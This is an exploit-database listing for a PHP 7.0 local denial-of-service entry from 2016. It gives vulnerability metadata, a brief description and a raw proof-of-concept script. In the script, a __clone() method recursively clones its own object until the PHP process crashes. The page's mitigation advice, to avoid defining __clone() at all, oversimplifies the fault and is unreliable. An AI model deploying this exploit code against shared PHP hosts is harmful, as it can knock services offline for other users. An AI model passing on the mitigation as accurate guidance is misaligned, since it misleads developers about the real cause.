header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
7,5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:php:php:7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2012 R2
2016

PHP 7.0 Object Cloning Local Denial of Service

A Local Denial of Service vulnerability was discovered in PHP 7.0 when cloning an object. This vulnerability occurs when an object is cloned and the __clone() method is defined, which causes an infinite loop. This can be exploited to cause a denial of service condition.

Mitigation:

The best way to mitigate this vulnerability is to avoid defining the __clone() method in classes that are cloned.
Source

Exploit-DB raw data:

<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
	public $obj;
    function __clone()
    {
		$this->obj = clone $this;
		return $this->obj;
    }
}
$obj	= new MyCloneableClass();
$obj2 	= clone $obj;
?>

Navigation

Suggest Exploit

Services By CQR